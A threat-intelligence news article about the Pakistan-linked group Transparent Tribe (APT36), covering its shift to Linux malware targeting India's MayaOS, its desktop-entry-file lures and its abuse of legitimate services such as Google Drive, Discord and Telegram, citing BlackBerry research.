A cyber-espionage group linked to Pakistan has shifted its tactics to incorporate a broader range of legitimate software techniques in order to evade cybersecurity defenses. This group, known as Transparent Tribe, has been targeting government agencies and defense firms in India with cyberattacks focused on compromising Windows systems and Android devices. However, in its most recent campaign, Transparent Tribe has shown a preference for Linux systems over Windows computers, with a majority of attacks utilizing Linux Executable and Linkable Format (ELF) binaries that specifically target India’s homegrown MayaOS distribution.
According to Ismael Valenzuela, vice president of threat intelligence and research at cybersecurity firm BlackBerry, Transparent Tribe has historically concentrated its efforts on infiltrating India’s government, military, and private industry. While the group has targeted other regions such as the US, Europe, and Australia, its primary focus remains on India. By leveraging lures associated with the Indian government or governing bodies, Transparent Tribe has consistently aimed at compromising critical sectors in the country.
The cybersecurity landscape in South Asia is known to be active, with various threat groups targeting different countries in the region. For example, the India-linked Sidewinder group has previously targeted Pakistan, Turkey, and China, while the Patchwork group has launched attacks on Pakistanis through malicious Android apps on the Google Play store. Additionally, the China-linked Evasive Panda group has targeted Tibetan nationals in India and the United States, and another group referred to as ToddyCat has focused on groups in Vietnam and Taiwan.
Transparent Tribe, also known as APT36 and Earth Karkaddan, has previously used romance scams to distribute the CapraRAT Android malware, aiming to compromise Indian government officials with information on the Kashmir region. In response to the escalating cyber threats, Pakistan has allocated significant funding for cybersecurity research and development to enhance its technical capabilities.
The latest development in Transparent Tribe’s tactics involves targeting Linux systems, a departure from its previous focus on Windows-based attacks. While the group is not considered highly sophisticated, it has achieved success by diversifying its techniques. By employing cross-platform programming languages such as Python, Golang, and Rust, Transparent Tribe can create programs for both Windows and Linux platforms, accommodating the widespread use of MayaOS in India’s military.
Transparent Tribe has also experimented with Linux compromises, utilizing a “desktop entry file” as an attack vector in certain situations. These files, which provide information and commands for Linux desktop systems, have been used in low-volume attacks by the group. Previous samples of Transparent Tribe’s malware included Android targets, but recent campaigns have not shown any signs of Android malware, according to BlackBerry’s analysis.
Furthermore, Transparent Tribe has incorporated legitimate tools and services into its attack infrastructure as part of the living-off-the-land trend. By utilizing email, compromised websites, Google Drive, VoIP services, and instant messenger apps like Discord and Telegram, the group can evade detection and operate stealthily. The weaponization of legitimate tools allows the group to blend in with normal network traffic and avoid arousing suspicion.
In conclusion, Transparent Tribe’s adoption of Linux targets and the use of legitimate software techniques underscore the group’s evolving tactics and adaptability in the face of increased cybersecurity measures. By diversifying its attack methods and leveraging legitimate services, Transparent Tribe continues to pose a significant threat to critical infrastructure and government entities in India and beyond.